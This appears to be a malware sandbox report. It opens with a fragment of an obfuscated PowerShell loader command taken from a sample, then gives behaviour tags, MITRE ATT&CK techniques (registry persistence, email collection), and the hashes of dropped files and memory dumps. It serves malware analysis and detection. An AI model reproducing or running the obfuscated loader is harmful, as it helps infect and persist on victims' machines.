NAbTRa ');Patarine ($Skjolddragers);Patarine (Resborgerne 'No$TePRhh .eBan iaZicD e et iNan.beRe.,nHFee Ma Adane.or os C[e $DiERau lk BaU,lStySupNotHou.os isB eSenFr] n=As$AcQReuOmiinn Aal m .iRadtiiLinNo ');$Tampen=Resborgerne 'Fo$B PTeh,geRen Ea bcbie tLeiFin Fe r.UnDAfoMiwStn Ul noApaSkd CFh.i Sl OeUd(Fy$ CVm eB rCag,ceTrd,q,gr$.lSPaoBalTee nsu),r ';$Solen=$Clyster123;Patarine (Resborgerne 'C $KogSkLHeoReb .A ,LT.: URAwaAnAUndUnGUnI.ev ,nExIfiN gRaE enM sF =Ca(S TBaEOvs DtCo-PrP pa itFuhKi De$VuS.uoB L,oe kN .) o ');while (!$Raadgivningens) {Patarine (Resborgerne ' $ZugTrl Oo Fb oaCil p:KfRPhdPon,ri nSugReeTrnse=Hj$EmtHur AuR eOp ') ;Patarine $Tampen;Patarine (Resborgerne 'BlSSeT oA rRUnTV - Rs lSoeheEPaP A Fn4sw ');Patarine (Resborgerne 'Mu$S gTrlAlO,tB Sa FL t: AR ua KaV D GStiCaVAdn EIInn CG OEMaN ES n=Sa(FoT sEPasWitM - DpSpa tNehSt J $Unsa osllB EHanPo)M ') ;Patarine (Resborgerne 'Ja$ egMeLsyo Db A il t:FosInoFiLUdkF.rOdegimB eC RAr=S,$KlGFlLPioSyB oANelTi: VSN o VMInn DoB,lSlEopSPeCKae EN rTFl+ U+ a%fo$ os L yIstTPoHFeEAsr .yIm.SkcBoo huCrn STCo ') ;$Verged=$Slithery[$Solkremer];}$Agersenneppen=326866;$Disyllabic=29427;Patarine (Resborgerne ' n$EmgL.LS,OReBP,AVoL.r: eBInK BK CE NDub ouSmnDoDMyE tNPaeAc St=T BnGM eXpTUn-CocHjoO NStTOrE ,nReTTo Si$ .s oP,lS,e WN i ');Patarine (Resborgerne ' e$ SgislcaoP b raKulCa: nWUniArnThgUdsS.pLeaOpnRu d.= M a[,lSPaySes atUreTam .LeCuhoAnnKov aeF rOut ].o:Bi:InFTerR oRem FB Sa as Re n6Hj4MaSR tAarReiGlnU gEx(T.$FoB .kHykBoe vn SbPhuWenKvdR,e n VePr) o ');Patarine (Resborgerne ' t$V GPhL TOK b .aFiLU.:InFS ipaS rk jeHuK Suslt atT.EJer SeTisSv Ca=El r[ .sReYF,SsaT EBuMSa.Mitr EreXnatMe.InePiNskCKao .D TI fn LgOu]Ca:Be:GiaMysTeC iI mIOp.veGUnE nTPosSgtMurBriPenHegCe(Ge$ wF,I QN SGEmS TpInA FnEj)bu ');Patarine (Resborgerne 'Me$s.GEjL O TbO.aHoLBo: Cs fKEkIWilJolLiIFrNdug,eSS vSpi NsFuEassTe=,r$FyF viP.SS,kO EKskToU mT cT einrIsEptSFi. FsBuU abBaSFoT rJuI BNHaG s(Tr$ uaFiG dek RR.sNeEDunOuN ueOvpLip.ne .NV , $PadIdI VSKoYLrLSjl FAMaB ei CLe) l ');Patarine $Skillingsvises;"
1⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
712a00a9d8164b3b6795c4e11800d2f1

SHA1
82952ef15a2e4e2b06cb149d3b206d11135128b5

SHA256
2a3b20384f9ce1100ea1c1d3fc24b874446506c627102da75ace1e7bcac4a052

SHA512
ab87d76996cf96e76f9182f72ffe16b1e014ac1ccbe2991a6cd85309622365fbf4a6e79023e616c529640f626cd3943bab9338816bf6ce6831cf5696d28ecd17

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
e7f459f9d7a36e8b23aae1bdcb4959ad

SHA1
88b3afea86ad83cc64e87c81dee17bd1844d817b

SHA256
092b59518c7f575e600939b72f1a8168d322244ae18e122874705a756eff5f2c

SHA512
943ff064bd2395d18160df69957bb37a1974a8834f5e690a312a268315a587c98b52d586cc3565a43d7712df9e06b87ea348684143ac9a599ce49d292f46d862

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
43b5331fd2889052c6bca7c098020216

SHA1
c0cd988a78dd801c34d09961f802e7ef49dc0054

SHA256
85bbb6a13277e2247b8522d670b81086013f4812375c49f3487e1971a4ee2441

SHA512
309b90eae3a001e64d3f885e0140b21a727eb97b92c2a6e632e53066304d4619d81e73ac1fb656a5497d50b8f59492bd52942d5044105edfe4ced5e24f9edb1c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
73f95809e7e3b1688bfd657333ebcce3

SHA1
af71b93dd6aa4dcdb6645294c6b518eeef626fa8

SHA256
3eab583fa272acb1330ab7c46bd5f2e2e91d7446efc91262debdfcbc13acc3b1

SHA512
6b540fb6525d4489cf23301e867427ce682f5c4e37ab615d09b78963579c6a5e1853f413b23828118f8f83067a1e682d76f1463d05d10b519fd3ee5435b15bcf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7b729b76807ea4216b633128f80dfded

SHA1
0affad81c35b6870bb7a8753be50c5b28551f922

SHA256
af667295e8d9d0582c76b18f6f4665bf6f22d0693cb36e55c5d31d6fa99f48cc

SHA512
3eddd456de350c50b9f18a259af572167f47afb28f42968ba716e9aa8c0d07d65fa5fcbeda1057f3382532bc04e0675c336a901c6c497ddcae5778d7c2ba8fb3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d4ff23c124ae23955d34ae2a7306099a

SHA1
b814e3331a09a27acfcd114d0c8fcb07957940a3

SHA256
1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

SHA512
f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

Download Submit
C:\Users\Admin\AppData\Local\Temp\Bedstevennens.bat

Filesize
4KB

MD5
8bb9cfef660160c41937bfa56c08be8b

SHA1
95315498f2528f22b3eb1a92a358b3c8c2557565

SHA256
1e62122bbacc6a81ea620657d8af2351d9cbf2b62b8ad72f95e765d3089f7332

SHA512
f1809b25970a748a1aadb158991f77fa478d548cadc1650d40a999c4c96c8d21f93e2d0186e2ca3dc36416ff57e8128b949dfc58d12a8b2caf71f929817a4321

Download Submit
C:\Users\Admin\AppData\Local\Temp\Objektiviseringens.vbs

Filesize
10KB

MD5
f002055fc7992f9d09ada41737d25973

SHA1
078f5e9377fa1cc9cc5a9bc557eb7de9c80fa4f6

SHA256
81d93fa88e39efd0747d7ac7a6bca7e9005644aae4aafa14a9a9c3d3559b76e0

SHA512
6825c0b4135c832f466d7d1972470994bde74dbd9b01507bfd267021f5443dffcf98a67d0c13765328a534676531ab4a4f3dde90a1c8b8ef704558e49fe349ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ed1etqfj.wdu.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ettiqmncrjcotuzkafygqkfggbimrlnzo

Filesize
4KB

MD5
ac300aeaf27709e2067788fdd4624843

SHA1
e98edd4615d35de96e30f1a0e13c05b42ee7eb7b

SHA256
d2637d58bb120dc6fefe2f38d6e0d4b308006b8639106a7f9e915fa80b5cc9d9

SHA512
09c46e708f9d253dccd4d943639d9f8126f868ae3dcd951aad12222bb98b5d3814676f878c8391b9bdab5dedcf5b9e9eaeb2ad3ffec57bda875198735586d4df

Download Submit
C:\Users\Admin\AppData\Roaming\Alkyds.jen

Filesize
471KB

MD5
0c1bd4714e1e2f1c31b42e526323957a

SHA1
4f350493ebb7c4ad88abb518573bdb7d9c134e41

SHA256
6839db073eb5646cbea13e6ba3256f6ff3b9cadd96349ee95d5c3ae588cd5362

SHA512
d03f7b9c9eabbc75e54e71b69f73a2971d135e98f8641c135f00c4f3dc26790dfbacf6cda62498b838a585ccb1955a00bb8c635bdb19e35182d361cda7d16b18

Download Submit
C:\Users\Admin\AppData\Roaming\Redbuds.Dip

Filesize
463KB

MD5
bf9d323f326e0ac2bc6650f6e9f36131

SHA1
a2bcc08dfb366743fd70519c534d480c411b7002

SHA256
79d596c1d3bbc0b342e087647b307aabe0235db433574f173a3a649d06b07c73

SHA512
f082cec0a18b35c943cfdb97b8ef25023f80716dc9b997c0371fdb3e042e7cb5d5c3527d6c6d8fd5f1ff83ea1ff1efee806abc4b2b35d0ad1b5ceb4824fc1c31

Download Submit
C:\Users\Admin\AppData\Roaming\Refleksbevgelsen.Owl

Filesize
492KB

MD5
ae539ac78cb0f35f03ce684e6d6590e0

SHA1
c27e0dcc69a455dfb44cdf5b64b8a1d39292a430

SHA256
c49f5790ac3c22cadfe47c9e646f49b15a7b387889b51be4e22c4cacb6010292

SHA512
d9d5135d32dffb6eea17d8935ef8b18f60e2146a1a6bcaca1caa19a16e822194d466938e12c8dd90a6d576564bf05017616b82b24e414a1d06ecc6e22027b1e8

Download Submit
memory/388-64-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/388-65-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/388-66-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1424-46-0x0000000009200000-0x000000000DC74000-memory.dmp

Filesize
74.5MB

Download
memory/1424-25-0x0000000006030000-0x0000000006096000-memory.dmp

Filesize
408KB

Download
memory/1424-43-0x0000000007A10000-0x0000000007A32000-memory.dmp

Filesize
136KB

Download
memory/1424-44-0x0000000008C50000-0x00000000091F4000-memory.dmp

Filesize
5.6MB

Download
memory/1424-41-0x0000000006DB0000-0x0000000006DCA000-memory.dmp

Filesize
104KB

Download
memory/1424-22-0x0000000002EF0000-0x0000000002F26000-memory.dmp

Filesize
216KB

Download
memory/1424-51-0x0000000027390000-0x00000000285E4000-memory.dmp

Filesize
18.3MB

Download
memory/1424-40-0x0000000008020000-0x000000000869A000-memory.dmp

Filesize
6.5MB

Download
memory/1424-39-0x0000000006820000-0x000000000686C000-memory.dmp

Filesize
304KB

Download
memory/1424-38-0x00000000067F0000-0x000000000680E000-memory.dmp

Filesize
120KB

Download
memory/1424-36-0x0000000006200000-0x0000000006554000-memory.dmp

Filesize
3.3MB

Download
memory/1424-26-0x0000000006190000-0x00000000061F6000-memory.dmp

Filesize
408KB

Download
memory/1424-23-0x0000000005960000-0x0000000005F88000-memory.dmp

Filesize
6.2MB

Download
memory/1424-98-0x00000000289F0000-0x0000000028A09000-memory.dmp

Filesize
100KB

Download
memory/1424-24-0x0000000005F90000-0x0000000005FB2000-memory.dmp

Filesize
136KB

Download
memory/1424-101-0x00000000289F0000-0x0000000028A09000-memory.dmp

Filesize
100KB

Download
memory/1424-102-0x00000000289F0000-0x0000000028A09000-memory.dmp

Filesize
100KB

Download
memory/1424-42-0x0000000007A70000-0x0000000007B06000-memory.dmp

Filesize
600KB

Download
memory/1616-74-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1616-75-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1616-68-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2824-73-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2824-69-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2824-67-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3212-2-0x00007FFE38D33000-0x00007FFE38D35000-memory.dmp

Filesize
8KB

Download
memory/3212-21-0x00007FFE38D30000-0x00007FFE397F1000-memory.dmp

Filesize
10.8MB

Download
memory/3212-18-0x00007FFE38D30000-0x00007FFE397F1000-memory.dmp

Filesize
10.8MB

Download
memory/3212-17-0x00007FFE38D30000-0x00007FFE397F1000-memory.dmp

Filesize
10.8MB

Download
memory/3212-14-0x00007FFE38D30000-0x00007FFE397F1000-memory.dmp

Filesize
10.8MB

Download
memory/3212-13-0x00007FFE38D30000-0x00007FFE397F1000-memory.dmp

Filesize
10.8MB

Download
memory/3212-3-0x0000024B6DEF0000-0x0000024B6DF12000-memory.dmp

Filesize
136KB

Download
memory/3336-157-0x0000000008C30000-0x000000000A5F9000-memory.dmp

Filesize
25.8MB

Download
memory/4832-158-0x0000000008F40000-0x000000000B1FC000-memory.dmp

Filesize
34.7MB

Download